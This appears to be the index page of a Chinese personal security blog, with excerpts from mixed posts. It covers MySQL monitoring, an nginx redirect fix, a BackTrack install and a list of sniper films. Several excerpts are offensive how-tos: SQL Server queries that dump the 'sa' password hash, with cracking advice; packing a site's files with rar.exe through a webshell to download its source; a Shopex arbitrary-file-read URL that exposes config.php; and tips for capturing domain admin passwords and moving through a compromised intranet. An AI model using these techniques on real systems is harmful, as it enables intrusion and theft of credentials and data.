Chinadu's Blog

安全研究人员大致可以分为两类： blackhat类型 & whitehat类型。

我想大多数的whitehat都是就职于甲方公司的，当然也有一些人白天假装是whitehat, 到了晚上摇身一变去干坏事了。由于我是在甲方工作，比较了解whitehat们整天都在干些啥， 安全加固， 制定策略， 代码review， 开发安全防护工具等等一切对保护公司安全有价值的事情。

blackhat呢？ 一部分在乙方工作， 一部分是无业游民， 但往往这些人都很有钱。 个人对blackhat所作的事情很感兴趣， 因为他可以无限制的去研究某种攻击技术， 无论花多少时间和精力，这是没有人会限制住他的。 当然他们不会轻易把自己的研究成果公布出来， 因为他们是靠那个吃饭的。 最多是在公众场合显摆下自己挖的0day, 顺便再在blog上yy几句， 我认识的一些blackhat大多行为低调， 你永远都不会知道他们的潜力究竟有多大。

whitehat呢？ 在甲方工作是没有那么多时间做研究的， 这个挤挤才能有。 在甲方你不能随便去搞一个研究， 跟保护公司安全无关的研究是不被接受的， 也就是说你花时间去研究了， 必须得有研究成果出来， 而且这个研究成果要对公司安全有价值才行，否则就是你的价值观有问题了， 价值观有问题的人KPI是不会及格的。
阅读全文...

Mysql作为广泛应用的数据库系统，平时运维工作中对她的监控必不可少，现在把我对Mysql数据库的监控体会写成下文，欢迎拍砖。
无论是DBA或是SA，监控的目标都很明确，无外乎

1.快速的得到Mysql过去一段时间或者当前运行的状态
2.因硬件升级或者系统配置的改变而诊断对Mysql数据库性能影响
3.在Mysql数据库系统出现故障要能够及时收到告警
4.为日后编写运维报告提供各项数据指标供分析
5.……

想到了再做补充。而所有以上这些目的，通过各种方法和手段都可以做到。

自从Mysql数据库系统启动并且提供服务，Mysql内部自身的一套“计数器”就开始工作，可以通过
Show Global Status ， Show global variables ，Show full processlist
得到Mysql数据库系统当前各种系统变量和状态 ，并且后文介绍个各种监控工具几乎都是对这三个指令的输出
进行数据的计算和统计分析。
阅读全文...

最佳方法在nginx.conf加入

http{
...
server_name_in_redirect off;
...
}

国内搜索到两种方法
第一种方法 用rewrite补上/

if (-d $request_filename){ rewrite ^/(.*)([^/])$ /$1$2/ permanent; }

阅读全文...

在进行内网渗透，尤其是在比较大型的网络环境下，很可能会遇到域这样一种特殊的网络环境，而在域环境下的内网渗透又将是另外一片天地。
首先还是先简要看一下域的概念吧：
域 (Domain) 是Windows网络中独立运行的单位，域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后，2个域之间不但可以按需要相互进行管理，还可以跨网分配文件和打印机等设备资源，使不同的域之间实现网络资源的共享与管理。
域既是 Windows 网络操作系统的逻辑组织单元，也是Internet的逻辑组织单元，在 Windows 网络操作系统中，域是安全边界。域管理员只能管理域的内部，除非其他的域显式地赋予他管理权限，他才能够访问或者管理其他的域；每个域都有自己的安全策略，以及它与其他域的安全信任关系。

通过上述的了解，我们可以知道域管理员的权限是相当大的，域管理员可以通过持有域的登陆票据从而实现对域内各个计算机的远程管理，即有权限登陆任何一台机器。那么在渗透的过程中我们就可以通过某种方式记录下管理员登陆的密码，当然了，这只是其中的一种思路。
阅读全文...

SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name='sa'
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in 'cain and abel' and then work the case sentive hash

SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.
阅读全文...

腾讯微博：http://t.qq.com/chinadu
新浪微博：http://t.sina.com.cn/chinadu

另外要腾讯微博邀请码的，在这留言，留下邮箱有的话第一时间发送。

一、安装
1、准备：
1).最小的USB驱动器的容量4GB的USB,格式为FAT32的;
2).BT4正式版：
下载地址：http://www.remote-exploit.org/backtrack_download.html
3).U盘启动制作工具：unetbootin
下载地址：http://unetbootin.sourceforge.net/
注意：unetbootin可以下载windows版或者Linux版，请按照自己的操作系统下载
2、运行Unetbootin并选择bt4为bt4-pre-final.iso，选择USB驱动器号，并点击OK开始作一个可启动的USB驱动器:

附件:

阅读全文...

1、狙击生死线
剧情介绍：
退伍神射狙击手遭人陷害成了替罪羊，被当作刺杀总统的疑犯通缉！他决定重拾狙击，开始反击复仇！

========================================

2、双狙人1
剧情简介
老兵贝林格与年轻的情报员米勒前往巴拿马刺杀该国军阀阿尔赫兹，在丛林中远离后方支援，两人各显示其能。

========================================

3、双狙人2
海军陆战队军士长贝奇退伍后却一直不得志。军中希望他到巴尔干半岛枪杀一名叛军首领，派给他充当观测兵的却是年轻的军中死刑犯柯尔。两人顺利地完成任务后柯尔竟然意外遭敌方逮捕。他才发现自己的任务根本是个幌子……
========================================

4、双狙人3
剧情介绍：
狙击手比吉特身为美国海军陆战队最具传奇性的狙击手，是海军陆战队的绝密武器，但这次他的枪口却被逼瞄向他的一个朋友……

========================================
阅读全文...

4月23号的早上5点5分了，IP为：58.49.195.65 的这哥们还没睡。
他究竟在干什么呢？

后面我就不截出来了，在尝试了我的几个弱密码之后，终于以失败告终。

Chinadu在这里友情提示：58.49.195.65的哥们，身体重要，早上5点多了，您还没睡，小心强奸不成反被操。

rar.exe是什么？它就是大名鼎鼎的winrar自带的命令行解压程序。在提权中我们经常要下载各种敏感文件，比如:SU目录。你想一下，如果su目录文件这么多，难道你要一个个的下载？？这明显就很麻烦，有了rar.exe一切变的简单了！

好了现在来介绍它的用法吧！得到了Webshell后，最好自己传一个rar.exe，虽然program files目录有，但是有时执行不了。rar.exe体积200K，呵呵！将就下。在CMDSHELL执行:D:1Rar.exe a -k -r -s -m1 E:web1.rar E:web。我来介绍下吧,"D:1rar.exe"是你上传的rar.exe,后面参数我会给大家放在下面；"E:web1.rar"是你压缩的文件存放的位置(在shell中一定要选能写的目录);"E:web"是你要打包的目录。很简单吧？以后在没有得到服务器，大家可以尝试我介绍的方法，下载整站源码。
rar.exe参数:
阅读全文...

影响版本： Shopex V4.8.4 V4.8.5
漏洞描述： 文件过滤不严，导致任意文件读取漏洞。
测试代码：

http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

可以连上数据库.
阅读全文...

1你的内网入口机器属于什么性质？例如：24小时运转的应用服务器、测试机器、员工办公机器、VPN？
根据你的回帖，可以得知，你目前既然已经拥有了数台内网服务器权限，那么应该是通过其内网反弹后门转发端口进入内网，我估计是应用服务器。而初期可能是通 过员工办公机器或者对方映射到公网上面的应用服务器进入内网的。

2此内网数据存储服务器属于几级内网？这个问题你未具体描述，因为往往会遇到1级、2级、3级甚至更深的类城域网结构。
这里假设你遇到的只是最初级的1级内网，既：内网可互通

3你目前行为的目的是什么？你描述说你需要将数据拷贝出来，但你又回帖说搞定了他们几台服务器，那么我的问题就是，根据你最后一次的回帖，不太明白你目前 的状况。A你无聊？B你还有其他目的？C你还没有搞定那台或数台数据储存服务器？
你不回答清楚，无法帮你参考啊。各种情况下，有不同的解决方式。
这里就仅认为你已经搞定数据储存服务器、并且只是基于成就感继续KO他们的服务器吧。
阅读全文...